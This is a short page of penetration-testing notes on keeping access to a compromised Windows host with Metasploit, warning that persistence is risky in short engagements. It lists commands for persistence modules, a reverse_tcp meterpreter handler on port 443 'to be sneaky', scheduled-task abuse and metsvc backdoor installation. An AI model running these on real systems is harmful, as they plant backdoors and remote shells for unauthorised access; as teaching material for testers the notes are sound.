Maintaining Access

Persistence is dangerous and usually unnecessary for junior-mid level pentesting (time limited engagements, not red teaming). It opens a port on a machine with no credentials--leaves it wide open for a future attack. You'll have to go back in and delete the service and remove it from the registry. It'll give you an RC file to go in and delete the files for you, but it's generally dangerous and unnecessary.

Persistence Scripts

meterpreter > run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence

If you want to get a meterpreter shell back:

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# might set lport to be a known port to be sneaky
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost 192.168.202.128

Scheduled Tasks

run scheduleme
run schtaskabuse

Metsvc

run metsvc -A

https://resources.infosecinstitute.com/penetration-testing-maintaining-access/resources.infosecinstitute.com

PreviousCleanup NextPivoting

Last updated 5 years ago

hashtagScheduled Tasks

hashtagMetsvc

Scheduled Tasks

Metsvc